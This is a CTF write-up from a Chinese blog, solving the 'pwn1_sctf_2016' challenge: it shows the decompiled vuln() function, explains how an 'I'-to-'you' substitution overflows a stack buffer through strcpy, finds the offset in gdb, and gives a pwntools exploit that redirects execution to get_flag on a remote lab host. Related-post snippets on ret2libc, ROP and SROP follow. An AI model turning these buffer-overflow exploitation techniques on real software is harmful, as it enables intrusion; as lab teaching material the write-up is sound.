pwn-1

最新推荐文章于 2023-07-10 19:45:47 发布
最新推荐文章于 2023-07-10 19:45:47 发布
阅读量517 收藏
点赞数
分类专栏: 笔记 ctf 文章标签: 安全 c++ 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/122024047
版权
笔记 同时被 2 个专栏收录
113 篇文章 5 订阅
订阅专栏
ctf
107 篇文章 4 订阅
订阅专栏

附件拖进32位ida查看反编译c代码。

main函数

查看main函数发现调用了vuln函数
在这里插入图片描述

vuln函数

在这里插入图片描述
vuln函数会读取输入的字符串长度限制为32在读取字符串的时候并不会产生溢出漏洞,而是在strcpy出重新赋值时造成溢出。

int vuln()
{
  const char *v0; // eax
  char s; // [esp+1Ch] [ebp-3Ch]
  char v3; // [esp+3Ch] [ebp-1Ch]
  char v4; // [esp+40h] [ebp-18h]
  char v5; // [esp+47h] [ebp-11h]
  char v6; // [esp+48h] [ebp-10h]
  char v7; // [esp+4Fh] [ebp-9h]

  printf("Tell me something about yourself: ");
  fgets(&s, 32, edata); //读取字符串限制长度为32
  std::string::operator=(&input, &s);
  std::allocator<char>::allocator(&v5);
  std::string::string(&v4, "you", &v5);
  std::allocator<char>::allocator(&v7);
  std::string::string(&v6, "I", &v7);
  replace((std::string *)&v3);
  std::string::operator=(&input, &v3, &v6, &v4);
  std::string::~string((std::string *)&v3);
  std::string::~string((std::string *)&v6);
  std::allocator<char>::~allocator(&v7);
  std::string::~string((std::string *)&v4);
  std::allocator<char>::~allocator(&v5);
  v0 = (const char *)std::string::c_str((std::string *)&input);
  strcpy(&s, v0);//字符串进行替换 会把I替换成you
  return printf("So, %s\n", &s);
}

gdb调试pwn程序

在这里插入图片描述
我们使用gdb测试pwn程序溢出长度,由于fgets函数限定了长度为32,我们利用I替换you这一点进行溢出测试。

测试

先输出20个I查看堆栈情况

IIIIIIIIIIIIIIIIIIII

在这里插入图片描述
溢出还没到ESP加大力度22个I

在这里插入图片描述
在EBP这个里字符串为youy,我们只多溢出了6个字符,说明到达ESP的溢出距离是22*3-2=64,然后加上get_flag函数的地址,即可getshell。

exp

from pwn import *

a = remote('redirect.do-not-trust.hacking.run',10020)


elf = ELF('C:\\Users\\63606\Desktop\CTF\CTF\\pwn1_sctf_2016')
buf = b"I" * 21 + b'a'
get_flag_address = (elf.symbols['get_flag'])
a.sendline((buf + p32(get_flag_address)))

a.interactive()

在这里插入图片描述
PTB{b0c8c20e-9e94-466e-b4c1-f7ae436bb96c}

[mzq]
关注
专栏目录
PWN学习---1、基本漏洞-缓冲区溢出
weixin_42766694的博客
04-19 476
环境:Ubuntu12.04 32位 一、存在漏洞代码 //vuln.c #include <stdio.h> #include <string.h> int main(int argc,char * argv []) { /* [1] */ char buf [256]; /* [2] */ strcpy(buf,argv [1]); /* [3] */ printf("input:%s \n",buf);
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2713
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
pwn100题目文件及exp.zip
08-09
栈溢出漏洞,没有system函数下需要使用DynELF函数来泄漏函数地址,本资源是利用read和puts函数来进行泄漏
pwn1
King
11-17 426
pwn1 1、将程序拖入IDA,找到主函数,按F5查看伪代码 2、程序的执行流程是通过gets()函数输入变量v4,如果变量v5等于440039336819(这是一个字符串,可以选中后,按r键,查看反向的字符串),则执行backdoor()函数 3、进入backdoor()函数,可以发现函数返回了system("/bin/sh") 4、我们想到可以通过覆盖变量的方式来达到控制程序执行流程的目的...
2023 ciscn 华东北分区赛 pwn vuln
z1r0的博客
07-10 410
还有一个漏洞点如下,可以利用buf覆盖到seed。如下就可以实现python和c的联合编程。
VulnCTF的练习教室v1.0-------WEB-----------第一题【LFI | 伪协议】
大方子
10-04 989
项目地址:https://github.com/jianmou/VulnCTF ============================ 个人收获: 1.利用PHP内置协议直接读取网页代码   ==============================     题目:   我们查看下网页源码 通过代码发现是文件包含。   我们把url改为http://local...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 481
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
PWN-Challenges
03-17
在"PWN-Challenges-main"这个压缩包中,我们可以期待找到一系列与PWN相关的练习题目和解决方案。这些挑战可能包括: 1. **基础PWN知识**:了解C/C++程序中的内存布局,如栈、堆、全局变量、BSS段等,以及它们在漏洞...
[BUUCTF-pwn]——ciscn_2019_s_3
Y_peak的博客
02-13 373
[BUUCTF-pwn]——ciscn_2019_s_3 题目地址:https://buuoj.cn/challenges#ciscn_2019_s_3 peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存
CTF常用函数
sun的博客
05-04 930
我们在做ctf题时经常需要看一些浏览器的请求和反应头,但是我们经常不能很好的了解他们,因此我对接收我们浏览器的请求头有关的后端$_SERVER变量做了一个总结。 $_SERVER``[``'HTTP_ACCEPT_LANGUAGE'``];``//浏览器语言 $_SERVER``[``'REMOTE_ADDR'``]; //当前用户 IP 。 $_SERVER``[``'REMOTE_HOS...
栈溢出总结之中级ROP
weixin_45097188的博客
03-01 358
ret2csu 原理: (所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。) 在64位程序中,函数的前6个参数是通过寄存器传递的,但是大多时候,我们很难找到每一个寄存器对应的gadgets。而这时我们就可以利用x64下的 __libc_csu_init中的gadgets。这个函数是用来对libc进行初始化操作的,而一般的程...
nmap vuln脚本扫描结果分析
heiseweiye的博客
08-30 5376
先上图,图中的是使用nmap的vuln的脚本扫描路由器的结果 首先主机已启动,可以看到对应的端口号,开放的服务以及相应的版本信息。 1、http-cookie-flags 检查HTTP服务设置的cookie。报告没有httponly标志的任何会话cookie。报告通过SSL设置而不使用安全标志的任何会话cookie。如果还运行了http-enum.nse,则除了根之外,还将检查由它找到的任何路...
pwn ciscn_2019_s_3
beaster1的博客
03-23 216
pwn ciscn_2019_s_3(srop) checksec一下发现是64位文件 并只开了NX保护 打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10) 发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax 看到最后有点奇怪开始时pop rbp mov rbp,rsp 程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了 所以r
return2libc学习笔记
omnispace的博客
03-29 4741
0x00 背景介绍 author:万抽抽 r2libc技术是一种缓冲区溢出利用技术,主要用于克服常规缓冲区溢出漏洞利用技术中面临的no stack executable限制(所以后续实验还是需要关闭系统的ASLR,以及堆栈保护),比如PaX和ExecShield安全策略。该技术主要是通过覆盖栈帧中保存的函数返回地址(eip),让其定位到libc库中的某个库函数(如,system等),而不是
显示recv调用次数_ctf中关于syscall系统调用的简单分析
weixin_39820136的博客
11-22 226
原创 紫色仰望 合天智汇 0x01我在动态调试这个程序的时候,发现 syscall调用 系统函数 的过程很有趣,于是便记录下来 希望对大家 能带来些帮助,这里 以 buu 平台上的 ciscn_2019_s_3 为例,给大家详细地分享以及分析下!0x02在开始之前,我们先来认真 学习下 read(),write()的 原型:read(): ssize_t read(int fd,const vo...
虎符CTF-2022 babygame 题解
CoLin的pwn小屋
04-01 1111
虎符CTF最简单的一道pwn题。
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值